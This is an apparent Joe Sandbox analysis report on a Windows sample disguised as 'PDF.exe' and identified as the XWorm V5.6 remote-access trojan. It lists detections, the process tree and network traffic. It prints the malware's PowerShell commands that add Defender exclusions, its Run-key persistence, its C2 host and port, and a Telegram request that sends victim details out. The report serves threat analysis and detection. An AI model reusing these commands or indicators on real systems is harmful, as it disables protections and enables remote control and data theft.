Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PDF.exe

Overview

General Information

Sample name:PDF.exe
Analysis ID:1502471
MD5:887dc892255e963fc4d834ffd5d92079
SHA1:5b322ab6d21829dda8effd690e9b4a1c8ad8db8f
SHA256:d483c827b461c93286dc9195dfbd8007a3c6fb19f8ecfa97b60410390aa2bf63
Tags:exexworm
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PDF.exe (PID: 732 cmdline: "C:\Users\user\Desktop\PDF.exe" MD5: 887DC892255E963FC4D834FFD5D92079)
    • powershell.exe (PID: 5012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7224 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PDF.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7492 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 8116 cmdline: "C:\Users\user\AppData\Local\Temp\XClient.exe" MD5: 887DC892255E963FC4D834FFD5D92079)
  • XClient.exe (PID: 5296 cmdline: "C:\Users\user\AppData\Local\Temp\XClient.exe" MD5: 887DC892255E963FC4D834FFD5D92079)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["tr3.localto.net"], "Port": "6475", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
PDF.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    PDF.exeJoeSecurity_XWormYara detected XWormJoe Security
      PDF.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        PDF.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          PDF.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x8c56:$s6: VirtualBox
          • 0x8bb4:$s8: Win32_ComputerSystem
          • 0x9708:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x97a5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x98ba:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x929a:$cnc4: POST / HTTP/1.1

          PCAP (Network Traffic)

          SourceRuleDescriptionAuthorStrings
          sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

            Dropped Files

            SourceRuleDescriptionAuthorStrings
            C:\Users\user\AppData\Local\Temp\XClient.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
              C:\Users\user\AppData\Local\Temp\XClient.exeJoeSecurity_XWormYara detected XWormJoe Security
                C:\Users\user\AppData\Local\Temp\XClient.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  C:\Users\user\AppData\Local\Temp\XClient.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    C:\Users\user\AppData\Local\Temp\XClient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x8c56:$s6: VirtualBox
                    • 0x8bb4:$s8: Win32_ComputerSystem
                    • 0x9708:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x97a5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x98ba:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x929a:$cnc4: POST / HTTP/1.1

                    Memory Dumps

                    SourceRuleDescriptionAuthorStrings
                    00000000.00000002.2898462305.00000000028D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                      00000000.00000000.1639412342.0000000000642000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                        00000000.00000000.1639412342.0000000000642000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                          00000000.00000000.1639412342.0000000000642000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                          • 0x8a56:$s6: VirtualBox
                          • 0x89b4:$s8: Win32_ComputerSystem
                          • 0x9508:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          • 0x95a5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                          • 0x96ba:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                          • 0x909a:$cnc4: POST / HTTP/1.1
                          00000000.00000002.2928719557.00000000128D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                            Click to see the 4 entries

                            Unpacked PEs

                            SourceRuleDescriptionAuthorStrings
                            0.0.PDF.exe.640000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                              0.0.PDF.exe.640000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                                0.0.PDF.exe.640000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                                  0.0.PDF.exe.640000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                                  • 0x8c56:$s6: VirtualBox
                                  • 0x8bb4:$s8: Win32_ComputerSystem
                                  • 0x9708:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                                  • 0x97a5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                                  • 0x98ba:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                                  • 0x929a:$cnc4: POST / HTTP/1.1
                                  0.2.PDF.exe.128e1a78.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                                    Click to see the 6 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\XClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PDF.exe, ProcessId: 732, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient
                                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PDF.exe", ParentImage: C:\Users\user\Desktop\PDF.exe, ParentProcessId: 732, ParentProcessName: PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe', ProcessId: 5012, ProcessName: powershell.exe
                                    Sigma detected: Script Interpreter Execution From Suspicious Folder
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PDF.exe", ParentImage: C:\Users\user\Desktop\PDF.exe, ParentProcessId: 732, ParentProcessName: PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', ProcessId: 7492, ProcessName: powershell.exe
                                    Sigma detected: Suspicious Script Execution From Temp Folder
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PDF.exe", ParentImage: C:\Users\user\Desktop\PDF.exe, ParentProcessId: 732, ParentProcessName: PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', ProcessId: 7492, ProcessName: powershell.exe
                                    Sigma detected: Change PowerShell Policies to an Insecure Level
                                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PDF.exe", ParentImage: C:\Users\user\Desktop\PDF.exe, ParentProcessId: 732, ParentProcessName: PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe', ProcessId: 5012, ProcessName: powershell.exe
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\XClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PDF.exe, ProcessId: 732, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient
                                    Sigma detected: Powershell Defender Exclusion
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PDF.exe", ParentImage: C:\Users\user\Desktop\PDF.exe, ParentProcessId: 732, ParentProcessName: PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe', ProcessId: 5012, ProcessName: powershell.exe
                                    Sigma detected: Non Interactive PowerShell Process Spawned
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PDF.exe", ParentImage: C:\Users\user\Desktop\PDF.exe, ParentProcessId: 732, ParentProcessName: PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe', ProcessId: 5012, ProcessName: powershell.exe

                                    Suricata Signatures

                                    Timestamp:2024-09-01T18:14:52.269536+0200
                                    SID:2853685
                                    Severity:1
                                    Source Port:64986
                                    Destination Port:443
                                    Protocol:TCP
                                    Classtype:A Network Trojan was detected
                                    Timestamp:2024-09-01T18:15:59.645993+0200
                                    SID:2855924
                                    Severity:1
                                    Source Port:65007
                                    Destination Port:6475
                                    Protocol:TCP
                                    Classtype:Malware Command and Control Activity Detected

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: PDF.exeAvira: detected
                                    Antivirus detection for URL or domain
                                    Source: tr3.localto.netAvira URL Cloud: Label: phishing
                                    Antivirus detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeAvira: detection malicious, Label: TR/Spy.Gen
                                    Found malware configuration
                                    Source: PDF.exeMalware Configuration Extractor: Xworm {"C2 url": ["tr3.localto.net"], "Port": "6475", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                                    Multi AV Scanner detection for domain / URL
                                    Source: tr3.localto.netVirustotal: Detection: 14%Perma Link
                                    Source: tr3.localto.netVirustotal: Detection: 14%Perma Link
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeReversingLabs: Detection: 86%
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeVirustotal: Detection: 81%Perma Link
                                    Multi AV Scanner detection for submitted file
                                    Source: PDF.exeReversingLabs: Detection: 86%
                                    Source: PDF.exeVirustotal: Detection: 81%Perma Link
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: PDF.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: PDF.exeString decryptor: tr3.localto.net
                                    Source: PDF.exeString decryptor: 6475
                                    Source: PDF.exeString decryptor: <123456789>
                                    Source: PDF.exeString decryptor: <Xwormmm>
                                    Source: PDF.exeString decryptor: XWorm V5.6
                                    Source: PDF.exeString decryptor: USB.exe
                                    Source: PDF.exeString decryptor: %Temp%
                                    Source: PDF.exeString decryptor: XClient.exe
                                    Source: PDF.exeString decryptor: BTC_Address
                                    Source: PDF.exeString decryptor: ETH_Address
                                    Source: PDF.exeString decryptor: TRC20_Address
                                    Source: PDF.exeString decryptor: Your_Token
                                    Source: PDF.exeString decryptor: Your_ID
                                    Source: PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64986 version: TLS 1.2
                                    Source: PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:65007 -> 185.141.35.22:6475
                                    Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:64986 -> 149.154.167.220:443
                                    C2 URLs / IPs found in malware configuration
                                    Source: Malware configuration extractorURLs: tr3.localto.net
                                    Uses the Telegram API (likely for C&C communication)
                                    Source: unknownDNS query: name: api.telegram.org
                                    Yara detected Generic Downloader
                                    Source: Yara matchFile source: PDF.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.0.PDF.exe.640000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.PDF.exe.128e1a78.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
                                    Source: global trafficTCP traffic: 192.168.2.4:64988 -> 185.141.35.22:6475
                                    Source: global trafficHTTP traffic detected: GET /botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB97C9347C020046B4843%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20PYW79587S%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                    Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                                    Source: Joe Sandbox ViewASN Name: AS43260TR AS43260TR
                                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                    Source: unknownDNS query: name: ip-api.com
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficHTTP traffic detected: GET /botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB97C9347C020046B4843%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20PYW79587S%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                    Source: global trafficDNS traffic detected: DNS query: tr3.localto.net
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 01 Sep 2024 16:14:52 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    Source: powershell.exe, 00000004.00000002.1832436188.00000268F881B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
                                    Source: powershell.exe, 00000001.00000002.1742593525.0000011820420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.co
                                    Source: PDF.exe, XClient.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                                    Source: powershell.exe, 00000001.00000002.1738813395.0000011818112000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1818443016.00000268F0072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1952383691.0000016710072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2154236852.000002BCB6C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: powershell.exe, 0000000B.00000002.2025788163.000002BCA6E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000001.00000002.1723565791.00000118082C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1768854127.00000268E0229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1864354266.0000016700229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2025788163.000002BCA6E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: PDF.exe, 00000000.00000002.2898462305.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1723565791.00000118080A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1768854127.00000268E0001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1864354266.0000016700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2025788163.000002BCA6C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000001.00000002.1723565791.00000118082C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1768854127.00000268E0229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1864354266.0000016700229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2025788163.000002BCA6E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 0000000B.00000002.2025788163.000002BCA6E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 00000001.00000002.1723565791.00000118080A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1768854127.00000268E0001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1864354266.0000016700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2025788163.000002BCA6C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: PDF.exe, XClient.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                                    Source: powershell.exe, 0000000B.00000002.2154236852.000002BCB6C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 0000000B.00000002.2154236852.000002BCB6C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 0000000B.00000002.2154236852.000002BCB6C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: powershell.exe, 0000000B.00000002.2025788163.000002BCA6E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: powershell.exe, 00000001.00000002.1738813395.0000011818112000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1818443016.00000268F0072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1952383691.0000016710072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2154236852.000002BCB6C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
